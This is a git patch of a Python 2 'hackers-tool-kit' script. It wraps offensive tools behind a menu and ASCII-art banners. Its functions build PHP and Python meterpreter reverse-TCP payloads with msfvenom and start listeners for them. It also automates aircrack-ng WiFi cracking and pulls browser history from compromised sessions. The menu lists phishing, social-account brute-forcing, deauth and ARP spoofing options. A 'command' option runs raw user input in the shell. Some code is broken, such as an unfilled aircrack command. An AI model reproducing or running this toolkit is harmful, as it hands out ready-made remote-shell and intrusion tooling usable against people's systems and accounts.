DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From d82d48d32c6190ed18305f9949551a9c927c2f84 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 2 Jun 2019 00:05:25 +0100 Subject: [PATCH 170/214] Add files via upload --- htk.py | 3208 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3208 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..6709cc8 --- /dev/null +++ b/htk.py @@ -0,0 +1,3208 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + 